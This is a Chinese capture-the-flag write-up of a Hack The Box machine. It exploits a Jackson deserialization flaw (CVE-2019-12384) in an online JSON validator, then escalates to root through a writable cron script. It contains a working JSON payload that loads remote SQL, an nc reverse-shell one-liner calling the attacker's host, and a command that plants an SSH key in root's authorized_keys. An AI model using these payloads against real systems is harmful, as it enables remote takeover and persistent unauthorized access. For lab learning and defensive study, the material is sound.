基本信息

端口扫描

常规22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV 10.10.10.214
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-29 14:53 CST
Nmap scan report for 10.10.10.214
Host is up (0.071s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds

80

是一个Online JSON beautifier & validator:

Jackson

Validate功能是beta,输入一些测试payload信息得到不同报错:

1
2
3
4
5
6
7
8
test
Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'test': was expecting 'null', 'true', 'false' or NaN

{"test"}
Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object

["test"]
Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.InvalidTypeIdException: Could not resolve type id 'test' as a subtype of [simple type, class java.lang.Object]: no such class found

可以知道是Jackson, 并且根据Could not resolve type id 'test',可以知道后端是在进行反序列化

CVE-2019-12384

搜索jackson deserialization vulnerability,我们可以得到CVE-2019-12384:

之后就是exp一步步打:

exploit

1
2
3
4
5
6
[
"ch.qos.logback.core.db.DriverManagerConnectionSource",
{
"url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http:\/\/10.10.14.10:9999\/inject.sql'"
}
]

打到pericles的shell:

inject.sql

1
2
3
4
5
6
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 4445 >/tmp/f'

user flag

pericles用户桌面得到user.txt:

为了方便后续操作可以直接写ssh公钥进去

提权信息

pspy跑一下,发现一个timer_backup.sh定时运行,并且这个文件我们可写,那么我们直接修改这个文件就可以以root权限执行任意命令:

1
2
3
4
5
6
7
wget http://10.10.14.10:9999/pspy64

2020/10/29 07:19:31 CMD: UID=0    PID=6480   | /bin/bash /usr/bin/timer_backup.sh


pericles@time:~$ ls -al /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Oct 29 07:20 /usr/bin/timer_backup.sh

提权

例如直接写ssh公钥:

1
echo "echo SSH_PUB_KEY >> /root/.ssh/authorized_keys" >> /usr/bin/timer_backup.sh

然后等它自动执行后就可以直接以root身份ssh连接

root flag

root用户目录得到root.txt:

参考资料